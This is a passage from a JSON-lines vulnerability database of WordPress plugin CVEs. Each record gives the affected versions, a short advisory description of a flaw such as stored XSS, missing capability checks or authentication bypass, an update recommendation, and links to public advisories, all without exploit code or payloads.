\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3115231\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1046","slug":"wp-user-avatar","versionImpact":"4.14.3","versionEndExcluding":"4.14.4","description":"The Paid Membership Plugin, Ecommerce, User Registration Form, Login Form, User Profile & Restrict Content \u2013 ProfilePress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin 'reg-number-field' shortcode in all versions up to, and including, 4.14.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 4.14.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7911c774-3fb0-4d6c-a847-101e5ad8637a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7911c774-3fb0-4d6c-a847-101e5ad8637a?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3030229\\\/wp-user-avatar\\\/trunk\\\/src\\\/ShortcodeParser\\\/Builder\\\/FieldsShortcodeCallback.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3030229\\\/wp-user-avatar\\\/trunk\\\/src\\\/ShortcodeParser\\\/Builder\\\/FieldsShortcodeCallback.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0870","slug":"yith-woocommerce-gift-cards","versionImpact":"4.12.0","versionEndExcluding":"4.13.0","description":"The YITH WooCommerce Gift Cards plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'save_mail_status' and 'save_email_settings' functions in all versions up to, and including, 4.12.0. This makes it possible for unauthenticated attackers to modify WooCommerce settings.","recommendation":"Update to version 4.13.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ca1f0dc6-c0bc-4e9f-b3b6-d6274aa7a7db?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ca1f0dc6-c0bc-4e9f-b3b6-d6274aa7a7db?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3084519\\\/yith-woocommerce-gift-cards\\\/trunk\\\/includes\\\/admin\\\/class-ywgc-admin.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3084519\\\/yith-woocommerce-gift-cards\\\/trunk\\\/includes\\\/admin\\\/class-ywgc-admin.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4013","slug":"gdpr-cookie-compliance","versionEndExcluding":"4.12.5","description":"The GDPR Cookie Compliance (CCPA, DSGVO, Cookie Consent) WordPress plugin before 4.12.5 does not have proper CSRF checks when managing its license, which could allow attackers to make logged in admins update and deactivate the plugin's license via CSRF attacks","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/54e4494c-a280-4d91-803d-7d55159cdbc5\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/54e4494c-a280-4d91-803d-7d55159cdbc5\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13585","slug":"ajax-search-lite","versionImpact":"4.12.4","versionEndExcluding":"4.12.5","description":"The Ajax Search Lite WordPress plugin before 4.12.5 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 4.12.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/270f213a-2fde-471c-ad09-2b44d11891ec\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/270f213a-2fde-471c-ad09-2b44d11891ec\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10568","slug":"ajax-search-lite","versionImpact":"4.12.3","versionEndExcluding":"4.12.4","description":"The Ajax Search Lite WordPress plugin before 4.12.4 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 4.12.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1676aef0-be5d-4335-933d-dc0d54416fd4\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1676aef0-be5d-4335-933d-dc0d54416fd4\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0212","slug":"cloudflare","versionImpact":"4.12.2","versionEndExcluding":"4.12.3","description":"The Cloudflare Wordpress plugin was found to be vulnerable to improper authentication. The vulnerability enables attackers with a lower privileged account to access data from the Cloudflare API.","recommendation":"Update to version 4.12.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/github.com\\\/cloudflare\\\/Cloudflare-WordPress\\\/security\\\/advisories\\\/GHSA-h2fj-7r3m-7gf2\",\"name\":\"https:\\\/\\\/github.com\\\/cloudflare\\\/Cloudflare-WordPress\\\/security\\\/advisories\\\/GHSA-h2fj-7r3m-7gf2\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/cloudflare\\\/Cloudflare-WordPress\\\/releases\\\/tag\\\/v4.12.3\",\"name\":\"https:\\\/\\\/github.com\\\/cloudflare\\\/Cloudflare-WordPress\\\/releases\\\/tag\\\/v4.12.3\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8619","slug":"ajax-search-lite","versionImpact":"4.12.1","versionEndExcluding":"4.12.2","description":"The Ajax Search Lite WordPress plugin before 4.12.3 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 4.12.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/84f6733e-028a-4288-b01a-7578a4a89dbe\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/84f6733e-028a-4288-b01a-7578a4a89dbe\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7084","slug":"ajax-search-lite","versionImpact":"4.12","versionEndExcluding":"4.12.1","description":"The Ajax Search Lite WordPress plugin before 4.12.1 does not sanitise and escape some parameters, which could allow users with a role as low as Admin+ to perform Cross-Site Scripting attacks.","recommendation":"Update to version 4.12.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0d38bf4d-de6a-49f8-be69-fa483fa61bb7\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0d38bf4d-de6a-49f8-be69-fa483fa61bb7\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0617","slug":"woo-product-category-discount","versionImpact":"4.11","versionEndExcluding":"4.12","description":"The Category Discount Woocommerce plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the wpcd_save_discount() function in all versions up to, and including, 4.12. This makes it possible for unauthenticated attackers to modify product category discounts that could lead to loss of revenue.","recommendation":"Update to version 4.12, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/996b44bb-d1e0-4f82-b8ee-a98b0ae994f9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/996b44bb-d1e0-4f82-b8ee-a98b0ae994f9?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-product-category-discount\\\/trunk\\\/cd-admin.php#L171\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-product-category-discount\\\/trunk\\\/cd-admin.php#L171\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3026242%40woo-product-category-discount&new=3026242%40woo-product-category-discount&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3026242%40woo-product-category-discount&new=3026242%40woo-product-category-discount&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4774","slug":"premium-addons-for-elementor","versionImpact":"4.11.8","versionEndExcluding":"4.11.9","description":"The Premium Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the data-countdown attribute of Countdown widget in all versions up to, and including, 4.11.8 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 4.11.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/premium-addons-for-elementor\\\/tags\\\/4.11.6\\\/assets\\\/frontend\\\/js\\\/jquery-countdown.js#L97\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/premium-addons-for-elementor\\\/tags\\\/4.11.6\\\/assets\\\/frontend\\\/js\\\/jquery-countdown.js#L97\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/024af9de-d4c7-43ec-a602-c45ded3ddad3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/024af9de-d4c7-43ec-a602-c45ded3ddad3?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9947","slug":"profilepress-pro","versionImpact":"4.11.1","versionEndExcluding":"4.11.2","description":"The ProfilePress Pro plugin for WordPress is vulnerable to authentication bypass in all versions up to, and including, 4.11.1. This is due to insufficient verification on the user being returned by the social login token. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they have access to the email and the user does not have an already-existing account for the service returning the token.","recommendation":"Update to version 4.11.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/61b477c3-88b7-45a4-9fc4-6bca6f7c3604?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/61b477c3-88b7-45a4-9fc4-6bca6f7c3604?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/profilepress.com\\\/\",\"name\":\"https:\\\/\\\/profilepress.com\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4413","slug":"motopress-hotel-booking-lite","versionImpact":"4.11.1","versionEndExcluding":"4.11.2","description":"The Hotel Booking Lite plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 4.11.1 via deserialization of untrusted input. This makes it possible for unauthenticated attackers to inject a PHP Object. No known POP chain is present in the vulnerable plugin. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code.","recommendation":"Update to version 4.11.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1d7f1283-a274-49a2-8bec-da178771b13a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1d7f1283-a274-49a2-8bec-da178771b13a?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/motopress-hotel-booking-lite\\\/trunk\\\/includes\\\/shortcodes\\\/checkout-shortcode\\\/step-checkout.php#L149\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/motopress-hotel-booking-lite\\\/trunk\\\/includes\\\/shortcodes\\\/checkout-shortcode\\\/step-checkout.php#L149\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3084187%40motopress-hotel-booking-lite%2Ftrunk&old=3081058%40motopress-hotel-booking-lite%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3084187%40motopress-hotel-booking-lite%2Ftrunk&old=3081058%40motopress-hotel-booking-lite%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2328","slug":"real-media-library-lite","versionImpact":"4.22.11","versionEndExcluding":"4.11.12","description":"The Real Media Library: Media Library Folder & File Manager plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the image title and alt text in all versions up to, and including, 4.22.11 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with author access and higher, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 4.11.12, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d359dc78-fc90-4570-a768-5f1a05f865e1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d359dc78-fc90-4570-a768-5f1a05f865e1?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/real-media-library-lite\\\/trunk\\\/inc\\\/view\\\/Gutenberg.php#L70\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/real-media-library-lite\\\/trunk\\\/inc\\\/view\\\/Gutenberg.php#L70\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3067589%40real-media-library-lite%2Ftrunk&old=3056657%40real-media-library-lite%2Ftrunk&sfp_email=&sfph_mail=#file4\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3067589%40real-media-library-lite%2Ftrunk&old=3056657%40real-media-library-lite%2Ftrunk&sfp_email=&sfph_mail=#file4\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1420","slug":"ajax-search-lite","versionEndExcluding":"4.11.1","description":"The Ajax Search Lite WordPress plugin before 4.11.1, Ajax Search Pro WordPress plugin before 4.26.2 does not sanitise and escape a parameter before outputting it back in a response of an AJAX action, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a9a54ee5-2b80-4f55-894c-1047030eea7f\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a9a54ee5-2b80-4f55-894c-1047030eea7f\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3277","slug":"mstore-api","versionImpact":"4.10.7","versionEndExcluding":"4.10.8","description":"The MStore API plugin for WordPress is vulnerable to Unauthorized Account Access and Privilege Escalation in versions up to, and including, 4.10.7 due to improper implementation of the Apple login feature. This allows unauthenticated attackers to log in as any user as long as they know the user's email address. We are disclosing this issue as the developer has not yet released a patch, but continues to release updates and we escalated this issue to the plugin's team 30 days ago.","recommendation":"Update to version 4.10.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mstore-api\\\/trunk\\\/controllers\\\/flutter-user.php#L821\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mstore-api\\\/trunk\\\/controllers\\\/flutter-user.php#L821\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1c7c0c35-5f44-488f-9fe1-269ea4a73854?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1c7c0c35-5f44-488f-9fe1-269ea4a73854?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11937","slug":"premium-addons-for-elementor","versionImpact":"4.10.69","versionEndExcluding":"4.10.70","description":"The Premium Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's linkURL in the Mobile Menu element in all versions up to, and including, 4.10.69 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 4.10.70, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3210517%40premium-addons-for-elementor%2Ftrunk&old=3208033%40premium-addons-for-elementor%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3210517%40premium-addons-for-elementor%2Ftrunk&old=3208033%40premium-addons-for-elementor%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/26337385-646f-4129-99be-7fa020f67f8e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/26337385-646f-4129-99be-7fa020f67f8e?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10266","slug":"premium-addons-for-elementor","versionImpact":"4.10.60","versionEndExcluding":"4.10.61","description":"The Premium Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Video Box widget in all versions up to, and including, 4.10.60 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 4.10.61, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c6102c07-2776-4963-8d16-a779c5979275?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c6102c07-2776-4963-8d16-a779c5979275?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3176303\\\/premium-addons-for-elementor\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3176303\\\/premium-addons-for-elementor\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6824","slug":"premium-addons-for-elementor","versionImpact":"4.10.38","versionEndExcluding":"4.10.39","description":"The Premium Addons for Elementor plugin for WordPress is vulnerable to unauthorized modification and loss of data due to a missing capability check on the 'check_temp_validity' and 'update_template_title' functions in all versions up to, and including, 4.10.38. This makes it possible for authenticated attackers, with Contributor-level access and above, to delete arbitrary content and update post and page titles.","recommendation":"Update to version 4.10.39, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b2840b9e-1baf-460c-ba11-43e4279ece27?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b2840b9e-1baf-460c-ba11-43e4279ece27?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/premium-addons-for-elementor\\\/trunk\\\/includes\\\/addons-integration.php#L159\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/premium-addons-for-elementor\\\/trunk\\\/includes\\\/addons-integration.php#L159\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/premium-addons-for-elementor\\\/trunk\\\/includes\\\/addons-integration.php#L184\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/premium-addons-for-elementor\\\/trunk\\\/includes\\\/addons-integration.php#L184\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3131564\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3131564\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6495","slug":"premium-addons-for-elementor","versionImpact":"4.10.36","versionEndExcluding":"4.10.37","description":"The Premium Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Animated Text widget in all versions up to, and including, 4.10.36 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 4.10.37, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/005fc05c-6d82-49ca-b114-a3e64a3a572f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/005fc05c-6d82-49ca-b114-a3e64a3a572f?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3115459\\\/premium-addons-for-elementor\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3115459\\\/premium-addons-for-elementor\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6340","slug":"premium-addons-for-elementor","versionImpact":"4.10.35","versionEndExcluding":"4.10.36","description":"The Premium Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Countdown widget in all versions up to, and including, 4.10.35 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9ed80507-f3e5-45a8-9498-8cebf97155ff?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9ed80507-f3e5-45a8-9498-8cebf97155ff?source=cve\",\"refsource\":\"\",\"tags\":[\"Third Party Advisory\"]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/premium-addons-for-elementor\\\/trunk\\\/assets\\\/frontend\\\/js\\\/premium-countdown-timer.js#L31\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/premium-addons-for-elementor\\\/trunk\\\/assets\\\/frontend\\\/js\\\/premium-countdown-timer.js#L31\",\"refsource\":\"\",\"tags\":[\"Product\"]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/premium-addons-for-elementor\\\/trunk\\\/assets\\\/frontend\\\/js\\\/premium-countdown-timer.js#L113\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/premium-addons-for-elementor\\\/trunk\\\/assets\\\/frontend\\\/js\\\/premium-countdown-timer.js#L113\",\"refsource\":\"\",\"tags\":[\"Product\"]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/premium-addons-for-elementor\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/premium-addons-for-elementor\\\/#developers\",\"refsource\":\"\",\"tags\":[\"Product\",\"Release Notes\"]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3111117\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3111117\\\/\",\"refsource\":\"\",\"tags\":[\"Patch\"]}]"}
{"CVE_ID":"CVE-2024-6434","slug":"premium-addons-for-elementor","versionImpact":"4.10.35","versionEndExcluding":"4.10.36","description":"The Premium Addons for Elementor plugin for WordPress is vulnerable to Regular Expression Denial of Service (ReDoS) in all versions up to, and including, 4.10.35. This is due to processing user-supplied input as a regular expression. This makes it possible for authenticated attackers, with Author-level access and above, to create and query a malicious post title, resulting in slowing server resources.","recommendation":"Update to version 4.10.36, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3c59d95a-b7f1-4a04-bbf4-bab2c42d6d75?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3c59d95a-b7f1-4a04-bbf4-bab2c42d6d75?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/premium-addons-for-elementor\\\/trunk\\\/includes\\\/class-premium-template-tags.php#L1676\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/premium-addons-for-elementor\\\/trunk\\\/includes\\\/class-premium-template-tags.php#L1676\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3110991\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3110991\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5553","slug":"premium-addons-for-elementor","versionImpact":"4.10.33","versionEndExcluding":"4.10.34","description":"The Premium Addons for Elementor plugin for WordPress is vulnerable to DOM-Based Stored Cross-Site Scripting via several parameters in all versions up to, and including, 4.10.33 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses and edits an injected element, and subsequently clicks the element with the mouse scroll wheel.","recommendation":"Update to version 4.10.34, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a80a3108-c685-4e26-9ecd-a0fe6ad4860c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a80a3108-c685-4e26-9ecd-a0fe6ad4860c?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/premium-addons-for-elementor\\\/tags\\\/4.10.32\\\/widgets\\\/premium-button.php#L2078\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/premium-addons-for-elementor\\\/tags\\\/4.10.32\\\/widgets\\\/premium-button.php#L2078\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3101015\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3101015\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4379","slug":"premium-addons-for-elementor","versionImpact":"4.10.31","versionEndExcluding":"4.10.32","description":"The Premium Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Global Tooltip widget in all versions up to, and including, 4.10.31 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 4.10.32, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cb0261c6-0477-4769-b92a-b49a192df4bb?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cb0261c6-0477-4769-b92a-b49a192df4bb?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/premium-addons-for-elementor\\\/tags\\\/4.10.31\\\/modules\\\/premium-global-tooltips\\\/module.php#L1247\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/premium-addons-for-elementor\\\/tags\\\/4.10.31\\\/modules\\\/premium-global-tooltips\\\/module.php#L1247\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3090037\\\/premium-addons-for-elementor\\\/trunk\\\/modules\\\/premium-global-tooltips\\\/module.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3090037\\\/premium-addons-for-elementor\\\/trunk\\\/modules\\\/premium-global-tooltips\\\/module.php\",\"refsource\":\"\",\"tags\":[]}]"}
